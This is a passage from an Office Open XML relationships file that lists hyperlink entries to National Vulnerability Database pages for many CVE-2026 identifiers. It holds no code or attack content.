Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70578" TargetMode="External" Id="rId997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70585" TargetMode="External" Id="rId998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71332" TargetMode="External" Id="rId999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71333" TargetMode="External" Id="rId1000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71340" TargetMode="External" Id="rId1001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71342" TargetMode="External" Id="rId1002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71351" TargetMode="External" Id="rId1003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71353" TargetMode="External" Id="rId1004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72926" TargetMode="External" Id="rId1005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72930" TargetMode="External" Id="rId1006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72952" TargetMode="External" Id="rId1007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72963" TargetMode="External" Id="rId1008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73003" TargetMode="External" Id="rId1009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73005" TargetMode="External" Id="rId1010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73022" TargetMode="External" Id="rId1011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77485" TargetMode="External" Id="rId1012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77894" TargetMode="External" Id="rId1013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77897" TargetMode="External" Id="rId1014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77899" TargetMode="External" Id="rId1015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77905" TargetMode="External" Id="rId1016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78457" TargetMode="External" Id="rId1017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78464" TargetMode="External" Id="rId1018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80093" TargetMode="External" Id="rId1019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81192" TargetMode="External" Id="rId1020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81389" TargetMode="External" Id="rId1021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82062" TargetMode="External" Id="rId1022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83940" TargetMode="External" Id="rId1023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83999" TargetMode="External" Id="rId1024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85360" TargetMode="External" Id="rId1025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86135" TargetMode="External" Id="rId1026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53933" TargetMode="External" Id="rId1027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62652" TargetMode="External" Id="rId1028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81531" TargetMode="External" Id="rId1029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81823" TargetMode="External" Id="rId1030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86804" TargetMode="External" Id="rId1031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86810" TargetMode="External" Id="rId1032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65812" TargetMode="External" Id="rId1033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68833" TargetMode="External" Id="rId1034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69415" TargetMode="External" Id="rId1035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69490" TargetMode="External" Id="rId1036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69566" TargetMode="External" Id="rId1037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71329" TargetMode="External" Id="rId1038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71348" TargetMode="External" Id="rId1039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71349" TargetMode="External" Id="rId1040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71350" TargetMode="External" Id="rId1041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72985" TargetMode="External" Id="rId1042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72999" TargetMode="External" Id="rId1043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74859" TargetMode="External" Id="rId1044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77892" TargetMode="External" Id="rId1045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78451" TargetMode="External" Id="rId1046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78579" TargetMode="External" Id="rId1047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69350" TargetMode="External" Id="rId1048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69373" TargetMode="External" Id="rId1049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69449" TargetMode="External" Id="rId1050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69820" TargetMode="External" Id="rId1051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71339" TargetMode="External" Id="rId1052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72927" TargetMode="External" Id="rId1053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72935" TargetMode="External" Id="rId1054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72948" TargetMode="External" Id="rId1055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78625" TargetMode="External" Id="rId1056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78630" TargetMode="External" Id="rId1057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85981" TargetMode="External" Id="rId1058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52486" TargetMode="External" Id="rId1059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69469" TargetMode="External" Id="rId1060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78545" TargetMode="External" Id="rId1061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78550" TargetMode="External" Id="rId1062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17509" TargetMode="External" Id="rId1063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18021" TargetMode="External" Id="rId1064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44766" TargetMode="External" Id="rId1065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53637" TargetMode="External" Id="rId1066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55256" TargetMode="External" Id="rId1067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58649" TargetMode="External" Id="rId1068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62437" TargetMode="External" Id="rId1069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62762" TargetMode="External" Id="rId1070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62801" TargetMode="External" Id="rId1071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64918" TargetMode="External" Id="rId1072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66303" TargetMode="External" Id="rId1073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66306" TargetMode="External" Id="rId1074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66308" TargetMode="External" Id="rId1075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66816" TargetMode="External" Id="rId1076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67369" TargetMode="External" Id="rId1077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67383" TargetMode="External" Id="rId1078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67386" TargetMode="External" Id="rId1079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67389" TargetMode="External" Id="rId1080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67390" TargetMode="External" Id="rId1081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67393" TargetMode="External" Id="rId1082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67624" TargetMode="External" Id="rId1083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67629" TargetMode="External" Id="rId1084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67630" TargetMode="External" Id="rId1085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67633" TargetMode="External" Id="rId1086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67641" TargetMode="External" Id="rId1087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67645" TargetMode="External" Id="rId1088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67648" TargetMode="External" Id="rId1089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68776" TargetMode="External" Id="rId1090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68777" TargetMode="External" Id="rId1091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68778" TargetMode="External" Id="rId1092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68779" TargetMode="External" Id="rId1093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68780" TargetMode="External" Id="rId1094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68781" TargetMode="External" Id="rId1095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68784" TargetMode="External" Id="rId1096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68898" TargetMode="External" Id="rId1097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69267" TargetMode="External" Id="rId1098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69297" TargetMode="External" Id="rId1099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69361" TargetMode="External" Id="rId1100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69374" TargetMode="External" Id="rId1101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69375" TargetMode="External" Id="rId1102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69395" TargetMode="External" Id="rId1103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69409" TargetMode="External" Id="rId1104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69497" TargetMode="External" Id="rId1105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69562" TargetMode="External" Id="rId1106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69624" TargetMode="External" Id="rId1107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69626" TargetMode="External" Id="rId1108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69636" TargetMode="External" Id="rId1109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69719" TargetMode="External" Id="rId1110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69734" TargetMode="External" Id="rId1111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69781" TargetMode="External" Id="rId1112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69839" TargetMode="External" Id="rId1113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70019" TargetMode="External" Id="rId1114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72938" TargetMode="External" Id="rId1115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72939" TargetMode="External" Id="rId1116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72942" TargetMode="External" Id="rId1117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72956" TargetMode="External" Id="rId1118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72974" TargetMode="External" Id="rId1119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72975" TargetMode="External" Id="rId1120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72977" TargetMode="External" Id="rId1121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73029" TargetMode="External" Id="rId1122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76000" TargetMode="External" Id="rId1123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76968" TargetMode="External" Id="rId1124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76971" TargetMode="External" Id="rId1125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77896" TargetMode="External" Id="rId1126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77911" TargetMode="External" Id="rId1127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78441" TargetMode="External" Id="rId1128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78453" TargetMode="External" Id="rId1129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78502" TargetMode="External" Id="rId1130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78503" TargetMode="External" Id="rId1131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78515" TargetMode="External" Id="rId1132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78520" TargetMode="External" Id="rId1133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78522" TargetMode="External" Id="rId1134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78838" TargetMode="External" Id="rId1135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79379" TargetMode="External" Id="rId1136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79573" TargetMode="External" Id="rId1137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80073" TargetMode="External" Id="rId1138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80076" TargetMode="External" Id="rId1139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80078" TargetMode="External" Id="rId1140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80079" TargetMode="External" Id="rId1141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80082" TargetMode="External" Id="rId1142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80084" TargetMode="External" Id="rId1143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80086" TargetMode="External" Id="rId1144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80087" TargetMode="External" Id="rId1145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80088" TargetMode="External" Id="rId1146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80089" TargetMode="External" Id="rId1147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80090" TargetMode="External" Id="rId1148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80091" TargetMode="External" Id="rId1149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81377" TargetMode="External" Id="rId1150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81792" TargetMode="External" Id="rId1151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81802" TargetMode="External" Id="rId1152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82059" TargetMode="External" Id="rId1153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82069" TargetMode="External" Id="rId1154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84282" TargetMode="External" Id="rId1155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84391" TargetMode="External" Id="rId1156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84685" TargetMode="External" Id="rId1157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86077" TargetMode="External" Id="rId1158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86078" TargetMode="External" Id="rId1159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86079" TargetMode="External" Id="rId1160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86082" TargetMode="External" 